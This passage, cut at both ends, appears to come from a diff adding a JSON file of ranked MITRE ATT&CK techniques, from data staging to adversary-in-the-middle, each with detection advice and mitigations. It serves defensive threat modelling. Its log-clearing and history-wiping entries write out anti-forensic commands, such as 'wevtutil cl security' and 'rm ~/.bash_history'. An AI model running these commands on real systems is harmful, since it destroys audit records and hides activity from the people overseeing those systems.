stage data in that instance.(Citation: Mandiant M-Trends 2020)\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.", + "url": "https://attack.mitre.org/techniques/T1074", + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 1.4679953248590476, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1074.001", + "name": "Data Staged: Local Data Staging", + "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.", + "url": "https://attack.mitre.org/techniques/T1074/001", + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [] + }, + { + "tid": "T1074.002", + "name": "Data Staged: Remote Data Staging", + "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.(Citation: Mandiant M-Trends 2020)\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", + "url": "https://attack.mitre.org/techniques/T1074/002", + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "mitigations": [] + } + ] + }, + { + "rank": 26, + "tid": "T1071", + "name": "Application Layer Protocol", + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", + "url": "https://attack.mitre.org/techniques/T1071", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "score": 1.466974040025714, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "subtechniques": [ + { + "tid": "T1071.001", + "name": "Application Layer Protocol: Web Protocols", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "url": "https://attack.mitre.org/techniques/T1071/001", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\nMonitor for web traffic to/from known-bad or suspicious domains. ", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.002", + "name": "Application Layer Protocol: File Transfer Protocols", + "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "url": "https://attack.mitre.org/techniques/T1071/002", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.003", + "name": "Application Layer Protocol: Mail Protocols", + "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "url": "https://attack.mitre.org/techniques/T1071/003", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.004", + "name": "Application Layer Protocol: DNS", + "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ", + "url": "https://attack.mitre.org/techniques/T1071/004", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\nMonitor for DNS traffic to/from known-bad or suspicious domains.", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + } + ] + }, + { + "rank": 27, + "tid": "T1068", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.\nWhen initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.\nAdversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.", + "url": "https://attack.mitre.org/techniques/T1068", + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules)\nHigher privileges are often necessary to perform additional actions such as some methods of OS Credential Dumping. Look for additional activity that may indicate an adversary has gained higher privileges.", + "score": 1.4266641062647618, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 28, + "tid": "T1070", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.\nThese actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.", + "url": "https://attack.mitre.org/techniques/T1070", + "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.", + "score": 1.3770079209523811, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ], + "subtechniques": [ + { + "tid": "T1070.001", + "name": "Indicator Removal on Host: Clear Windows Event Logs", + "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\nThe event logs can be cleared with the following utility commands:\n
    \n
  • wevtutil cl system
    • \n
  • wevtutil cl application
    • \n
  • wevtutil cl security
    • \n
\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or PowerShell.", + "url": "https://attack.mitre.org/techniques/T1070/001", + "detection": "Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or PowerShell (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: \"The audit log was cleared\").", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1070.002", + "name": "Indicator Removal on Host: Clear Linux or Mac System Logs", + "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/ directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n
    \n
  • /var/log/messages:: General and system-related messages
    • \n
  • /var/log/secure or /var/log/auth.log: Authentication logs
    • \n
  • /var/log/utmp or /var/log/wtmp: Login records
    • \n
  • /var/log/kern.log: Kernel logs
    • \n
  • /var/log/cron.log: Crond logs
    • \n
  • /var/log/maillog: Mail server logs
    • \n
  • /var/log/httpd/: Web server access and error logs
    • \n
", + "url": "https://attack.mitre.org/techniques/T1070/002", + "detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1070.003", + "name": "Indicator Removal on Host: Clear Command History", + "description": "In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.\nOn Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.\nAdversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.\nOn Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.\nThe PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)\nAdversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)", + "url": "https://attack.mitre.org/techniques/T1070/003", + "detection": "User authentication, especially via remote terminal services like SSH, without new entries in that user's ~/.bash_history is suspicious. Additionally, the removal/clearing of the ~/.bash_history file can be an indicator of suspicious activity.\nMonitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1039", + "name": "Environment Variable Permissions", + "description": "Prevent modification of environment variables by unauthorized users and groups.", + "url": "https://attack.mitre.org/mitigations/M1039" + } + ] + }, + { + "tid": "T1070.004", + "name": "Indicator Removal on Host: File Deletion", + "description": "Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\nThere are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)", + "url": "https://attack.mitre.org/techniques/T1070/004", + "detection": "It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe.", + "mitigations": [] + }, + { + "tid": "T1070.005", + "name": "Indicator Removal on Host: Network Share Connection Removal", + "description": "Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and SMB/Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\\share /delete command. (Citation: Technet Net Use)", + "url": "https://attack.mitre.org/techniques/T1070/005", + "detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares. SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.", + "mitigations": [] + }, + { + "tid": "T1070.006", + "name": "Indicator Removal on Host: Timestomp", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\nTimestomping may be used along with file name Masquerading to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)", + "url": "https://attack.mitre.org/techniques/T1070/006", + "detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "mitigations": [] + } + ] + }, + { + "rank": 29, + "tid": "T1189", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.\nMultiple ways of delivering exploit code to a browser exist, including:\n
    \n
  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
    • \n
  • Malicious ads are paid for and served through legitimate ad providers.
    • \n
  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
    • \n
\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)\nTypical drive-by compromise process:\n
    \n
  1. A user visits a website that is used to host the adversary controlled content.
    2. \n
  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
      \n
    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
      • \n
    \n
    3. \n
  3. Upon finding a vulnerable version, exploit code is delivered to the browser.
    4. \n
  4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
      \n
    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
      • \n
    \n
    5. \n
\nUnlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)", + "url": "https://attack.mitre.org/techniques/T1189", + "detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\nNetwork intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "score": 1.3659335206476189, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1021", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "url": "https://attack.mitre.org/mitigations/M1021" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 30, + "tid": "T1482", + "name": "Domain Trust Discovery", + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)", + "url": "https://attack.mitre.org/techniques/T1482", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information, such as nltest /domain_trusts. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the DSEnumerateDomainTrusts() Win32 API call to spot activity associated with Domain Trust Discovery.(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as PowerShell. The .NET method GetAllTrustRelationships() can be an indicator of Domain Trust Discovery.(Citation: Microsoft GetAllTrustRelationships)", + "score": 1.3455398569866666, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [] + }, + { + "rank": 31, + "tid": "T1560", + "name": "Archive Collected Data", + "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.", + "url": "https://attack.mitre.org/techniques/T1560", + "detection": "Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\nA process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "score": 1.3230527608038094, + "process_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1560.001", + "name": "Archive Collected Data: Archive via Utility", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.\nSome 3rd party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems.", + "url": "https://attack.mitre.org/techniques/T1560/001", + "detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1560.002", + "name": "Archive Collected Data: Archive via Library", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including Python rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", + "url": "https://attack.mitre.org/techniques/T1560/002", + "detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "mitigations": [] + }, + { + "tid": "T1560.003", + "name": "Archive Collected Data: Archive via Custom Method", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", + "url": "https://attack.mitre.org/techniques/T1560/003", + "detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", + "mitigations": [] + } + ] + }, + { + "rank": 32, + "tid": "T1557", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation. By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in Transmitted Data Manipulation. Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.", + "url": "https://attack.mitre.org/techniques/T1557", + "detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.", + "score": 